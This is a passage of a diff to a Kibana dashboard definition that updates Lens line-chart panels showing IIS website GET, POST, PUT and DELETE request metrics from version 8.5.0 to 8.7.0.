"7861c5c5-3d3c-4822-9fd8-0a438969a9d8": { + "columnOrder": [ + "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", + "1408fa39-ab30-4bdd-a0ac-438e7fd74509", + "11793948-c9e3-4dc7-b746-c42c1d00deae" + ], + "columns": { + "11793948-c9e3-4dc7-b746-c42c1d00deae": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "GET Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7861c5c5-3d3c-4822-9fd8-0a438969a9d8": { - "columnOrder": [ - "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", - "1408fa39-ab30-4bdd-a0ac-438e7fd74509", - "11793948-c9e3-4dc7-b746-c42c1d00deae" - ], - "columns": { - "11793948-c9e3-4dc7-b746-c42c1d00deae": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "GET Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.get_requests_per_sec" - }, - "1408fa39-ab30-4bdd-a0ac-438e7fd74509": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "601cb08d-c29b-4337-a9f7-7f6a4befdbf3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - 
"otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.get_requests_per_sec" + }, + "1408fa39-ab30-4bdd-a0ac-438e7fd74509": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "601cb08d-c29b-4337-a9f7-7f6a4befdbf3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11793948-c9e3-4dc7-b746-c42c1d00deae" - ], - "layerId": "7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", - "xAccessor": "1408fa39-ab30-4bdd-a0ac-438e7fd74509", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "11793948-c9e3-4dc7-b746-c42c1d00deae" - } - ] - } - ], - "legend": { - 
"isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11793948-c9e3-4dc7-b746-c42c1d00deae" + ], + "layerId": "7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", - "w": 12, - "x": 0, - "y": 24 - }, - "panelIndex": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", - "title": "GET Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", + "xAccessor": "1408fa39-ab30-4bdd-a0ac-438e7fd74509", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "11793948-c9e3-4dc7-b746-c42c1d00deae" + } + ] + } + ], + "legend": { + "isVisible": 
true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "dd6cafd2-1561-4ba1-9c52-011c21954dd5": { - "columnOrder": [ - "18aac651-4b5a-4cc9-bc07-c27539729436", - "d6c60abc-b75c-489b-8b2f-bd91c6403403", - "be40db0d-71d9-4873-801f-8465d970591c" - ], - "columns": { - "18aac651-4b5a-4cc9-bc07-c27539729436": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "be40db0d-71d9-4873-801f-8465d970591c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total POST Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_post_requests" - }, - 
"d6c60abc-b75c-489b-8b2f-bd91c6403403": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "GET Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "49524a34-1a10-49bf-842f-20d2606380a4", + "w": 12, + "x": 12, + "y": 36 + }, + "panelIndex": "49524a34-1a10-49bf-842f-20d2606380a4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dd6cafd2-1561-4ba1-9c52-011c21954dd5": { + "columnOrder": [ + "18aac651-4b5a-4cc9-bc07-c27539729436", + "d6c60abc-b75c-489b-8b2f-bd91c6403403", + "be40db0d-71d9-4873-801f-8465d970591c" + ], + "columns": { + "18aac651-4b5a-4cc9-bc07-c27539729436": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - 
"fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "be40db0d-71d9-4873-801f-8465d970591c" - ], - "layerId": "dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "18aac651-4b5a-4cc9-bc07-c27539729436", - "xAccessor": "d6c60abc-b75c-489b-8b2f-bd91c6403403", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "be40db0d-71d9-4873-801f-8465d970591c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + }, + "be40db0d-71d9-4873-801f-8465d970591c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total POST Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_post_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "d6c60abc-b75c-489b-8b2f-bd91c6403403": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" 
+ } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "be40db0d-71d9-4873-801f-8465d970591c" + ], + "layerId": "dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "49524a34-1a10-49bf-842f-20d2606380a4", - "w": 12, - "x": 12, - "y": 36 - }, - "panelIndex": "49524a34-1a10-49bf-842f-20d2606380a4", - "title": "Total POST Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "18aac651-4b5a-4cc9-bc07-c27539729436", + "xAccessor": "d6c60abc-b75c-489b-8b2f-bd91c6403403", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "be40db0d-71d9-4873-801f-8465d970591c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + 
"enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total POST Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", + "w": 12, + "x": 24, + "y": 36 + }, + "panelIndex": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "28214240-350e-4835-afe0-f1e8d73e524c": { + "columnOrder": [ + "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", + "9b25acbb-2591-43c7-8740-6423f5ce1387", + "02c7871a-a870-4e24-910c-ab281d070615" + ], + "columns": { + "02c7871a-a870-4e24-910c-ab281d070615": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total PUT Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "28214240-350e-4835-afe0-f1e8d73e524c": { - "columnOrder": [ - "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", - "9b25acbb-2591-43c7-8740-6423f5ce1387", - "02c7871a-a870-4e24-910c-ab281d070615" - ], - "columns": { - "02c7871a-a870-4e24-910c-ab281d070615": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total PUT Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_put_requests" - }, - "635ddcd4-14ba-41ee-a1d4-e878cc6756f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - 
"customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "9b25acbb-2591-43c7-8740-6423f5ce1387": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_put_requests" + }, + "635ddcd4-14ba-41ee-a1d4-e878cc6756f9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "02c7871a-a870-4e24-910c-ab281d070615" - ], - "layerId": "28214240-350e-4835-afe0-f1e8d73e524c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - 
"splitAccessor": "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", - "xAccessor": "9b25acbb-2591-43c7-8740-6423f5ce1387", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(22,165,165,1)", - "forAccessor": "02c7871a-a870-4e24-910c-ab281d070615" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "9b25acbb-2591-43c7-8740-6423f5ce1387": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "02c7871a-a870-4e24-910c-ab281d070615" + ], + "layerId": "28214240-350e-4835-afe0-f1e8d73e524c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - 
"hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", - "w": 12, - "x": 24, - "y": 36 - }, - "panelIndex": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", - "title": "Total PUT Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", + "xAccessor": "9b25acbb-2591-43c7-8740-6423f5ce1387", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "02c7871a-a870-4e24-910c-ab281d070615" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total PUT Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", + "w": 12, + "x": 36, + "y": 36 + }, + "panelIndex": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b1559e3-6201-4b20-a2bf-29069bc0382d": { + "columnOrder": [ + 
"c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", + "b792aa69-a49e-48b5-8353-ccfefb00743e", + "23404543-95e7-4820-b55a-fffdae388ef9" + ], + "columns": { + "23404543-95e7-4820-b55a-fffdae388ef9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total DELETE Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0b1559e3-6201-4b20-a2bf-29069bc0382d": { - "columnOrder": [ - "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", - "b792aa69-a49e-48b5-8353-ccfefb00743e", - "23404543-95e7-4820-b55a-fffdae388ef9" - ], - "columns": { - "23404543-95e7-4820-b55a-fffdae388ef9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total DELETE Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_delete_requests" - }, - "b792aa69-a49e-48b5-8353-ccfefb00743e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - 
"size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_delete_requests" + }, + "b792aa69-a49e-48b5-8353-ccfefb00743e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "23404543-95e7-4820-b55a-fffdae388ef9" - ], - "layerId": "0b1559e3-6201-4b20-a2bf-29069bc0382d", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", - "xAccessor": "b792aa69-a49e-48b5-8353-ccfefb00743e", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(244,78,59,1)", - "forAccessor": "23404543-95e7-4820-b55a-fffdae388ef9" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - 
"showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "23404543-95e7-4820-b55a-fffdae388ef9" + ], + "layerId": "0b1559e3-6201-4b20-a2bf-29069bc0382d", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", - "w": 12, - "x": 36, - "y": 36 - }, - "panelIndex": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", - "title": "Total DELETE Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", + "xAccessor": "b792aa69-a49e-48b5-8353-ccfefb00743e", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(244,78,59,1)", + "forAccessor": "23404543-95e7-4820-b55a-fffdae388ef9" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + 
"showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total DELETE Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "f0a4e232-26f6-4b33-b728-62f73cd74f08", + "w": 12, + "x": 0, + "y": 36 + }, + "panelIndex": "f0a4e232-26f6-4b33-b728-62f73cd74f08", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "aa318ea4-9a32-4128-9637-ceee407f2b93": { + "columnOrder": [ + "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", + "38b75d84-47c1-44ff-8636-2b921bdd8532", + "3320bd98-e6de-45f5-ba1c-73970b10e884" + ], + "columns": { + "3320bd98-e6de-45f5-ba1c-73970b10e884": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total GET Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "aa318ea4-9a32-4128-9637-ceee407f2b93": { - "columnOrder": [ - "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", - "38b75d84-47c1-44ff-8636-2b921bdd8532", - 
